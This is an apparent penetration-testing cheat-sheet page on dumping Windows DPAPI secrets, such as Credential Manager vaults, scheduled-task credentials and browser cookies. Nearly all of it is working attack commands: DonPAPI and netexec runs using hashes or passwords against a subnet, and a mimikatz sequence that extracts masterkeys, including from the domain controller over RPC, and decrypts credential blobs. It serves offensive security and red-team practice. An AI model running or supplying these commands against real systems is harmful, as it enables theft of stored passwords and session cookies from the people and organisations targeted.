DPAPI, Browser Cookies, and CredMan

Windows needs to stored encrypted secrets for things like scheduled task logons and web cookies. These are stored in the Windows Credential Manager as "vaults" - vaults hold encrypted credential blobs. If you're a local Administrator, you can dump the DPAPI masterkey and decrypt the vault credentials.

DonPAPI is an amazing tool for this! Specify -nr to stop collecting SAM and LSASS and watch the cleartext creds roll in!

donpapi collect -d jotter.com -u Administrator -H HASHES -t 10.10.10.0/24 --pvkfile ./backup.pvk

Netexec also has a module for DPAPI/cookies:

nxc smb 10.10.10.10 -u Admin -p Pass --dpapi

# No SAM/LSASS
nxc smb 10.10.10.10 -u Admin -p Pass --dpapi nosystem 

# Browser Cookies only
nxc smb 10.10.10.10 -u Admin -p Pass --dpapi cookies

Manual Identification

Locating Credentials

Look for stored user credentials and scheduled task credentials.

C:\Users\USERNAME\AppData\Roaming\Microsoft\Protect
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Credentials

You can also use mimikatz to list vault credentials.

mimikatz sekurlsa::dpapi

Decrypting

After identifying a target credential, locate the associated masterkey GUID.

mimikatz sekurlsa::dpapi --> Identify matching masterkey GUID

You can also send a request to the DC for the masterkey for your user's creds.

mimikatz dpapi::masterkey /in:C:\Users\USERNAME\AppData\Roaming\Microsoft\Protect\S-1-5-21-569305411-121244042-2357301523-1104\bfc5090d-22fe-4058-8953-47f6882f549e /rpc

Finally, decrypt the credential with the masterkey.

mimikatz dpapi::cred /in:C:\Users\USERNAME\AppData\Local\Microsoft\Credentials\6C33AC85D0C4DCEAB186B3B2E5B1AC7C /masterkey:8d15395a4bd40a61d5eb6e526c552f598a398d530ecc2f5387e07605eeab6e3b4ab440d85fc8c4368e0a7ee130761dc407a2c4d58fcd3bd3881fa4371f19c214

PreviousKerberos Tickets NextPivoting to Entra

Last updated 1 month ago